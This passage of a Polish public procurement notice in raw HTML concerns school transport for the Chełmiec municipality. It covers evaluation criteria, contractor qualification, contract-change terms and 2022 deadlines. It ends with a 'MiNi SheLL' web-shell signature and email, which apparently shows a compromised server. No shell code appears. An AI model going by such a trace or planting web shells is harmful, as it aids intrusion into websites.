udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">a) Oferty zostaną ocenione na podstawie przyjętych kryteriów dla każdej z części z osobna.<br/> b) Zamawiający udzieli zamówienia temu Wykonawcy, którego oferta uzyska najwyższą ilość punktów w przyjętych kryteriach oceny ofert dla danej części, pod warunkiem, że oferta ta nie podlega odrzuceniu oraz z zastrzeżeniem możliwości przeprowadzenia negocjacji.<br/> c) Zamawiający poprawi w tekście oferty omyłki zgodnie z art. 223 ust. 2 uPzp.<br/> d) W toku dokonywania badania i oceny ofert Zamawiający może żądać udzielenia przez Wykonawców wyjaśnień dotyczących treści złożonych przez nich ofert, zgodnie z art. 223 ust. 1 uPzp.<br/> e) Zamawiający odrzuci ofertę, jeżeli wystąpią okoliczności wskazane w art. 226 ust. 1 uPzp.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia pojazdu zastępczego w razie awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa transportu dzieci i młodzieży w zakresie dowozu i odwozu do szkół z terenu gminy Chełmiec wraz z zapewnieniem im opieki podczas transportu, we wszystkie dni nauki szkolnej, zgodnie z kalendarzem roku szkolnego. Za dowóz rozumie się dowóz uczniów z wyznaczonego przystanku w miejscu zamieszkania do szkół i placówek oraz odwóz uczniów ze szkół i placówek na wyznaczony przystanek w miejscu zamieszkania. Dowóz uczniów do szkół będzie się odbywał w godzinach porannych, odwóz uczniów ze szkół w godzinach popołudniowych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60112000-6 - Usługi w zakresie publicznego transportu drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 15.	W tym postępowaniu zamawiający przewiduje skorzystania z prawa opcji. Zamówienie z użyciem PRAWA OPCJI to zamówienie w ramach którego Zamawiający dopuszcza możliwość zwiększenia zamówienia podstawowego o dodatkową usługę, zgodnie z cenami wykazanymi przez Wykonawcę w Formularzu ofertowym, stanowiącym załącznik nr 1 do SWZ, który zostanie złożony wraz z ofertą.<br/>16.	Zamawiający przewiduje możliwość skorzystania z prawa opcji polegającego na zleceniu dodatkowych usług transportu uczniów do szkół w drugim semestrze roku szkolnego 2022/2023 tj. od dnia 14.02.2023 r. do dnia 23.06.2023 r. (tj. 91 dni) na takich samych warunkach jak zawartych w pierwotnej umowie. <br/><br/>17.	W przypadku skorzystania z prawa opcji wynagrodzenie płatne będzie w wysokości wynikającej z wartości dokonanej opcji, na zasadach przewidzianych w niniejszej umowie dla zamówienia podstawowego.<br/><br/>18.	Skorzystanie z prawa opcji uzależnione będzie wyłącznie od potrzeb i możliwości finansowych Zamawiającego. Wykonawca nie ma roszczenia o wykonanie prawa opcji.<br/><br/>19.	Skorzystanie z prawa opcji następuje poprzez złożenie oświadczenia Zamawiającego o skorzystaniu z prawa opcji oraz poprzez zawarcie aneksu terminowego.<br/><br/>20.	Postanowienia SWZ odnoszące się do ZAMÓWIENIA PODSTAWOWEGO przedmiotu zamówienia znajdują odpowiednie zastosowanie do zamówienia objętego prawem opcji. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-09-01 do 2023-01-27</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">a) Oferty zostaną ocenione na podstawie przyjętych kryteriów dla każdej z części z osobna.<br/> b) Zamawiający udzieli zamówienia temu Wykonawcy, którego oferta uzyska najwyższą ilość punktów w przyjętych kryteriach oceny ofert dla danej części, pod warunkiem, że oferta ta nie podlega odrzuceniu oraz z zastrzeżeniem możliwości przeprowadzenia negocjacji.<br/> c) Zamawiający poprawi w tekście oferty omyłki zgodnie z art. 223 ust. 2 uPzp.<br/> d) W toku dokonywania badania i oceny ofert Zamawiający może żądać udzielenia przez Wykonawców wyjaśnień dotyczących treści złożonych przez nich ofert, zgodnie z art. 223 ust. 1 uPzp.<br/> e) Zamawiający odrzuci ofertę, jeżeli wystąpią okoliczności wskazane w art. 226 ust. 1 uPzp.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Warunki udziału w postępowaniu dotyczą:<br/> <br/> a) zdolności do występowania w obrocie gospodarczym:<br/> Zamawiający nie stawia warunku w tym zakresie.<br/> <br/> b) uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów:<br/> Niniejszy warunek Zamawiający uzna za spełniony, jeżeli Wykonawca posiada licencję na wykonywanie transportu drogowego.<br/> <br/> c) sytuacji ekonomicznej lub finansowej:<br/> W ramach niniejszego warunku wykonawca ma obowiązek wykazać, że posiada aktualną, ważną polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.<br/><br/> d) zdolności technicznej lub zawodowej:<br/> Niniejszy warunek Zamawiający uzna za spełniony, jeżeli Wykonawca dysponuje zarejestrowanymi autobusami, busami o liczbie miejsc siedzących w liczbie niezbędnej dla realizacji usługi. Ponadto Wykonawca przed podpisaniem umowy zobowiązany jest do przedstawienia prawa jazdy oraz zezwolenia na wykonywanie regularnych specjalistycznych przewozów. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">◦ w celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu Zamawiający wymaga:<br/> a) oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 uPzp, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej, według wzoru stanowiącego załącznik nr 5 do SWZ,<br/> b) oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 uPzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego, o których mowa w: <br/> • art. 108 ust. 1 pkt. 1 uPzp<br/> • art. 108 ust. 1 pkt. 2 uPzp<br/> • art. 108 ust. 1 pkt 3 uPzp, <br/> • art. 108 ust. 1 pkt 4 uPzp, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka zapobiegawczego, <br/> • art. 108 ust. 1 pkt 5 uPzp, dotyczących zawarcia z innymi wykonawcami porozumienia mającego na celu zakłócenie konkurencji, <br/> • art. 108 ust. 1 pkt 6 uPzp, <br/> • art. 109 ust. 1 pkt 1 uPzp, odnośnie do naruszenia obowiązków dotyczących płatności podatków i opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach lokalnych (Dz. U. z 2019 r. poz. 1170), <br/> • art. 109 ust. 1 pkt. 4 uPzp<br/> • art. 109 ust. 1 pkt. 6 uPzp.<br/>• art. 7 ust. 1 Ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na<br/>Ukrainę oraz służących ochronie bezpieczeństwa narodowego.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">◦ na potwierdzenie warunków udziału w postępowaniu, o którym mowa w rozdziale VII SWZ ust. 1 lit b Zamawiający żąda dokumentu potwierdzającego posiadanie licencji na wykonywanie transportu drogowego<br/> ◦ na potwierdzenie warunków udziału w postępowaniu, o którym mowa w rozdziale VII SWZ ust. 1 lit. c Zamawiający żąda przedłożenia dokumentów potwierdzających, że Wykonawca posiada aktualną, ważną polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.<br/> ◦ Na potwierdzenie warunków udziału w postępowaniu, o którym mowa w rozdziale VII SWZ ust.1 lit. d Zamawiający żąda przedłożenia dokumentu, z którego wynika, że Wykonawca dysponuje zarejestrowanymi autobusami, busami o liczbie miejsc siedzących w liczbie niezbędnej dla realizacji usługi. Ponadto Wykonawca przed podpisaniem umowy zobowiązany jest do przedstawienia prawa jazdy oraz zezwolenia na wykonywanie regularnych specjalistycznych przewozów.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Formularz ofertowy (stanowiący treść oferty), zgodnie z załącznikiem nr 1 do SWZ, składany za pomocą środków komunikacji elektronicznej należy opatrzyć kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym na zasadach określonych w rozdziale XII SWZ. <br/> 2. Oświadczenie wstępnie potwierdzające spełnienie przez wykonawcę warunków udziału w postępowaniu oraz brak przesłanek do wykluczenia, o którym mowa w art. 125 ust. 1 uPzp zgodnie z załącznikiem nr 2 do SWZ, składane za pomocą środków komunikacji elektronicznej należy opatrzyć kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym na zasadach określonych w rozdziale XII SWZ. <br/> 3. Pełnomocnictwo do reprezentowania Wykonawcy – w przypadku złożenia oferty przez pełnomocnika. Pełnomocnictwo musi zawierać w szczególności ustanowionego pełnomocnika oraz zakres jego umocowania. <br/> 4. Zaparafowany wzór umowy - należy dołączyć do oferty jako potwierdzenie akceptacji postanowień jej zapisów. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Oświadczenia i dokumenty Wykonawców występujących wspólnie: a) Wykonawcyustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówieniaalbo do<br/>reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówieniapublicznego.W<br/>związku z tym należy wskazane pełnomocnictwo złożyć wraz z ofertą. b) Wodniesieniu do<br/>warunku udziału w postępowaniu dotyczącego zdolności technicznej lubzawodowej wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia mogą polegać nazdolnościach tych z<br/>wykonawców, którzy wykonają roboty budowlane, do realizacji których tezdolności są<br/>wymagane. W tym przypadku, wykonawcy wspólnie ubiegający się o udzieleniezamówienia<br/>dołączają do oferty oświadczenie, z którego wynika, które roboty budowlanewykonają<br/>poszczególni wykonawcy. c) Wykonawcy występujący wspólnie powinni złożyćoświadczenia i<br/>dokumenty, o których mowa w niniejszym rozdziale SWZ, z tym, że oświadczeniewstępne<br/>wymienione w ust. 1 niniejszego rozdziału SWZ (oświadczenie wg wzoru stanowiącegozałącznik<br/>nr 2 do SWZ) składa każdy Wykonawca z osobna, natomiast oświadczeniapotwierdzające<br/>spełnianie warunków udziału w postępowaniu określonych przez Zamawiającegomogą być<br/>składane wspólnie. d) Dokument o którym mowa w ust. 1 niniejszego<br/>rozdziałuSWZ(oświadczenie wg wzoru stanowiącego załącznik nr 2 do SWZ) powinien potwierdzaćspełnianie warunków udziału w postępowaniu w zakresie, w którym każdy z<br/>wykonawcówwykazuje spełnianie warunków udziału w postępowaniu. e) Zamawiający nie<br/>zastrzegaobowiązku osobistego wykonania przez poszczególnych wykonawców wspólnie<br/>ubiegającychsię o udzielenie zamówienia publicznego kluczowych zadań dotyczących<br/>przedmiotowegozamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 4. Zamawiający zastrzega sobie możliwość zmian postanowień umowy w zakresie przedmiotu umowy w następujących przypadkach: <br/> a) rozszerzenie lub zawężenie trasy: - w przypadku zmiany szkoły/placówki do których uczęszczają dzieci w trakcie roku szkolnego; - w przypadku rezygnacji z dowozu, zastąpienia jednego dziecka innym dzieckiem, którego podanie wpłynęło w trakcie realizacji zamówienia, bez względu na adres zamieszkania i adres placówki, do której dziecko będzie dowożone; - w przypadku zmiany adresu zamieszkania dzieci w trakcie roku szkolnego; <br/> b) zmiana częstotliwości kursów, liczby przewozów, terminów wykonywania usługi – w przypadku gdy jest to podyktowane obiektywnymi czynnikami niemożliwymi do przewidzenia <br/> c) zawieszenie usług na czas określony, w szczególności w przypadku trwania stanu pandemii COVID-19.<br/>d) zmniejszenie ilości kursów w związku z ogłoszeniem dni wolnych od szkoły (godzin dyrektorskich w poszczególnych szkołach).<br/>e) skorzystanie z prawa opcji poprzez zawarcie aneksu terminowego na kolejny okres realizacji usługi tj. przedłużenie umowy do dnia 23.06.2023.<br/>f) zmiana cen jednostkowych za km trasy – Zamawiający dokona waloryzacji wynagrodzenia, jeżeli cena oleju napędowego/benzyny (w zależności od rodzaju paliwa używanego w pojazdach Wykonawcy) przekroczy próg 8,20 zł netto za 1 l paliwa. W takim przypadku Zamawiający dokona waloryzacji wynagrodzenia za 1 km trasy o wskaźnik inflacji za miesiąc w którym zmiana ceny miała miejsce. W przypadku kiedy ceny powrócą do poprzednich wartości Wykonawca będzie świadczył usługę po cenach przedstawionych w ofercie.<br/><br/> 5. Zamawiający zastrzega sobie prawo zmiany tras przewozu dzieci, ilości przewozów w tygodniu, terminów ich wykonywania oraz liczby dzieci, ze względu na okoliczności których strony nie mogły przewidzieć w chwili zawarcia umowy, a podyktowanych potrzebami Zamawiającego wynikającymi z realizacji obowiązku zapewnienia dzieciom dowozu do szkół/placówek. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-08-09 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/chelmiec</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-08-09 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-09-07</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <p class="mb-0">Część 3 : <span class="normal">Tak</span></p> <p class="mb-0">Część 4 : <span class="normal">Tak</span></p> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> Kryterium pierwsze – „Cena”: <br/> W kryterium „Cena” ilość punktów zostanie obliczona oddzielnie dla każdej części oferty, według poniższego wzoru: <br/> K1 = ( CN / CB ) x 60 <br/> K1 – punkty otrzymane przez ofertę w kryterium „Cena” <br/> CN – najniższa cena spośród wszystkich ważnych ofert (nieodrzuconych) <br/> CB - cena w ofercie badanej <br/> W tym kryterium jako „cena” przyjęta zostanie „cena brutto za km trasy” podana przez Wykonawcę w Formularzu ofertowym. <br/> Kryterium drugie – „Czas podstawienia pojazdu zastępczego w razie awarii”: <br/> W kryterium „Czas podstawienia pojazdu zastępczego w razie awarii” ilość punktów zostanie przyznana oddzielnie dla każdej części oferty, według tabeli zwartej w SWZ.

Creat By MiNi SheLL
Email: jattceo@gmail.com